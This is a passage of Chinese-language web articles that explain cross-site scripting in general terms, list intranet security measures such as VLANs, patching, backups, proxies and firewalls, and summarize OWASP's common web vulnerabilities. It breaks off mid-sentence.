跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会用十六进制(或其他编码方式)将链接编码,以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子,那么用户乙在浏览这篇帖子时,恶意脚本就会执行,盗取用户乙的session信息。有关攻击方法的详细情况将在下面阐述。 如何保证内网通信安全?_追雨制作 内网是网络应用中的一个主要组成部分,其安全性也受到越来越多的重视。据不完全统计,国外在建设内网时,投资额的15%是用于加强内网的网络安全。在我国IT市场中,安全厂商保持着旺盛的增长势头。运营商在内网安全方面的投资比例不如国外多,但依然保持着持续的增长态势。要提高内网的安全,可以使用的方法很多,本文将就此做一些探讨。采用安全交换机由于内网的信息传输采用广播技术,数据包在广播域中很容易受到监听和截获,因此需要使用安全交换机,利用网络分段及VLAN的方法从物理上或逻辑上隔离网络资源,以加强内网的安全性。操作系统的安全从终端用户的程序到服务器应用服务、以及网络安全的很多技术,都是运行在操作系统上的,因此,保证操作系统的安全是整个安全系统的根本。除了不断增加安全补丁之外,还需要建立一套对系统的监控系统,并建立和实施有效的用户口令和访问控制等制度。对重要资料进行备份在内网系统中数据对用户的重要性越来越大,实际上引起电脑数据流失或被损坏、篡改的因素已经远超出了可知的病毒或恶意的攻击,用户的一次错误操作,系统的一次意外断电以及其他一些更有针对性的灾难可能对用户造成的损失比直接的病毒和黑客攻击还要大。为了维护企业内网的安全,必须对重要资料进行备份,以防止因为各种软硬件故障、病毒的侵袭和黑客的破坏等原因导致系统崩溃,进而蒙受重大损失。对数据的保护来说,选择功能完善、使用灵活的备份软件是必不可少的。目前应用中的备份软件是比较多的,配合各种灾难恢复软件,可以较为全面地保护数据的安全。使用代理网关使用代理网关的好处在于,网络数据包的交换不会直接在内外网络之间进行。内部计算机必须通过代理网关,进而才能访问到Internet ,这样操作者便可以比较方便地在代理服务器上对网络内部的计算机访问外部网络进行限制。在代理服务器两端采用不同协议标准,也可以阻止外界非法访问的入侵。还有,代理服务的网关可对数据封包进行验证和对密码进行确认等安全管制。设置防火墙防火墙的选择应该适当,对于微小型的企业网络,可从Norton Internet Security 、 PCcillin 、天网个人防火墙等产品中选择适合于微小型企业的个人防火墙。而对于具有内部网络的企业来说,则可选择在路由器上进行相关的设置或者购买更为强大的防火墙产品。对于几乎所有的路由器产品而言,都可以通过内置的防火墙防范部分的攻击,而硬件防火墙的应用,可以使安全性得到进一步加强。 Web应用常见的安全漏洞有哪些?_追雨制作 随着存在安全隐患的Web应用程序数量的骤增,Open Web Application Security Project (开放式Web应用程序安全项目,缩写为OWASP)总结出了现有Web应用程序在安全方面常见的十大漏洞,以提醒企业及其程序开发人员尽量避免它们给企业IT系统带来的安全风险:非法输入Unvalidated Input在数据被输入程序前忽略对数据合法性的检验是一个常见的编程漏洞。随着OWASP对Web应用程序脆弱性的调查,非法输入的问题已成为大多数Web应用程序安全漏洞方面的一个普遍现象。失效的访问控制Broken Access Conol大部分企业都非常关注对已经建立的连接进行控制,但是,允许一个特定的字符串输入可以让攻击行为绕过企业的控制。失效的账户和线程管理Broken Authentication and Session Management有良好的访问控制并不意味着万事大吉,企业还应该保护用户的密码、会话令牌、账户列表及其它任何可为攻击者提供有利信息、能帮助他们攻击企业网络的内容。跨站点脚本攻击Cross Site Scripting Flaws这是一种常见的攻击,当攻击脚本被嵌入企业的Web页面或其它可以访问的Web资源中,没有保护能力的台式机访问这个页面或资源时,脚本就会被启动,这种攻击可以影响企业内成百上千员工的终端电脑。缓存溢出问题Buffer Overflows这个问题一般出现在用较早的编程语言、如C语言编写的程序中,这种编程错误其实也是由于没有很好地确定输入内容在内存中的位置所致。注入式攻击Injection Flaws如果没有成功地阻止带有语法含义的输入内容,有可能导致对数据库信息的非法访问,在Web表单中输入的内
展开阅读全文